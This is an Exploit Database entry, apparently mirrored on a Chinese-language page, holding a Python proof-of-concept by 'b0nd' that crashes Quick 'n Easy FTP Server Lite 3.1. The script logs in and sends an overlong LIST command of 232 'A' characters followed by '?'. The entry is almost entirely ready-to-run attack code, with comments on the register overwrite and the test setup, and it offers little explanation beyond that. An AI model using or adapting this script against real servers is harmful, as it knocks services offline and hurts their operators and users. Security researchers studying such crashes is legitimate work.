Quick ‘n Easy FTP Server Lite 3.1 – Denial of Service

• Exploit Database
• 10 阅读

• 作者： b0nd
  日期： 2010-06-03
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/12853/

• #!/usr/bin/python
  
  print "\n############################################################"
  print "##		 Team Hackers Garage			##"
  print "##	Quick 'n Easy FTP Server Lite Version 3.1	##"
  print "##		 Crash PoC			##"
  print "##		 Sumit Sharma (aka b0nd)		##"
  print "##		sumit.iips@gmail.com			##"
  print "##							##"
  print "##	Special Thanks to: Double_Zero		##"
  print "##	(http://www.exploit-db.com/author/DouBle_Zer0)##"
  print "##			 &				##"
  print "##		corelanc0d3r (CORELAN TEAM)		##"
  print "##							##"
  print "############################################################"
  
  # Summary: The "LIST" command in Version 3.1 of Quick 'n Easy FTP Server Lite is vulnerable 
  # Tested on: Windows XP SP2
  # ftp> ls AAAA... 232 A's...AAA?
  # Server Crash!
  # Only EBX gets overwritten at the time of crash with the string following first 232 A's (in case using longer string).
  # No SEH overwrite
  # No EIP overwrite
  
  
  from socket import *
  
  host = "172.12.128.4"		# Virtual Windows XP SP2
  port = 21
  user = "test"			# "upload" and "download" access
  password = "test"
  
  
  s = socket(AF_INET, SOCK_STREAM)
  s.connect((host, port))
  print s.recv(1024)
  
  s.send("user %s\r\n" % (user))
  print s.recv(1024)
  
  s.send("pass %s\r\n" % (password))
  print s.recv(1024)
  
  buffer = "LIST "
  buffer += "A" * 232
  buffer += "?"
  buffer += "\r\n"
  
  s.send(buffer)
  print s.recv(1024)
  s.close()
  print "---->>> Server Crash!!!"